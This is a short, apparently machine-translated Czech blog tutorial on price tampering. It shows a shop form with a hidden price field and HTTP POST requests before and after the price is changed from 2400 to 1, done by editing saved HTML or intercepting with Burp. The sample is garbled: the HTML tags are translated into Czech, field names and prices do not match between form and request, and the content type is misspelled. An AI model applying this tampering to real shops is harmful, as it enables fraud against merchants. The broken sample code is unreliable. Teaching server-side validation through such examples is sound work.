Průnik: Aplikace HTTP hlaviček

Admin · Zveřejněno 07.02.2015 17:59:07

O aplikaci HTTP hlaviček

HTTP hlavička se běžně používá v mechanismu přenosu webových stránek, ale většina začátečníků v Číně si tohoto článku nevšimla, tento článek je věnován pouze začátečníkům a roli HTTP hlavičky v procesu průniku.

Vezměme si například nákupní stránku pro analýzu malé části role HTTP hlaviček.

Nejprve si pojďme zanalyzovat formulář na nákupní stránce.

<formová metoda="post" akce="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br /> 

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<typ vstupu="skrytý" název="cena" hodnota="449">

<typ vstupu="odeslat" hodnota="Koupit">

</form>

Během otevíracího procesu si pořiďte screenshot jeho hlavičky http zprávy a podívejte se na ni

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

množství=1&cena=2400

Ačkoli se pole cena při otevření nákupní stránky na stránce nezobrazí, uživatel jej může stále upravovat a ovládat.

Existují dva způsoby, jak dosáhnout úpravy

1. Uložit zdrojový kód HTML pro úpravu a poté jej znovu načíst do prohlížeče pro spuštění

2. Použití proxy interception k úpravě HTTP hlaviček (konstrukce proxy v nástroji burp)

Jako příklad si vezměte výše uvedený HTTP hlavičku
Před změnou
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

množství=1&cena=2400

Po změně
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

množství=1&cena=1

V posledním řádku je pole Cena v hodnotě 2400 a pokud ji změníme na 1, můžeme získat iPhone 4S za nižší cenu.

Tento článek pouze naznačuje nečekané přínosy, jako je injekce LDAP.

[Bezpečnostní tutoriál] Průnik: Aplikace HTTP hlaviček

Související příspěvky

Prohlížené sekce